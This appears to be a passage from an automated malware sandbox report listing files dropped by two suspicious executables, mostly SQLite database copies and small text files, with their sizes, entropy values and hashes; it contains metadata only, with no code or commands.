                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.6998645060098685
                      Encrypted:false
                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                      MD5:1676F91570425F6566A5746BC8E8427E
                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                      Malicious:false
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.698473196318807
                      Encrypted:false
                      SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                      MD5:4D0D308F391353530363283961DF2C54
                      SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                      SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                      SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                      Malicious:false
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.690299109915258
                      Encrypted:false
                      SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                      MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                      SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                      SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                      SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                      Malicious:false
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.6998645060098685
                      Encrypted:false
                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                      MD5:1676F91570425F6566A5746BC8E8427E
                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                      Malicious:false
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.690299109915258
                      Encrypted:false
                      SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                      MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                      SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                      SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                      SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.6998645060098685
                      Encrypted:false
                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                      MD5:1676F91570425F6566A5746BC8E8427E
                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.698473196318807
                      Encrypted:false
                      SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                      MD5:4D0D308F391353530363283961DF2C54
                      SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                      SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                      SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.690299109915258
                      Encrypted:false
                      SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                      MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                      SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                      SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                      SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.6998645060098685
                      Encrypted:false
                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                      MD5:1676F91570425F6566A5746BC8E8427E
                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.698473196318807
                      Encrypted:false
                      SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                      MD5:4D0D308F391353530363283961DF2C54
                      SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                      SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                      SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1581
                      Entropy (8bit):5.102603067114144
                      Encrypted:false
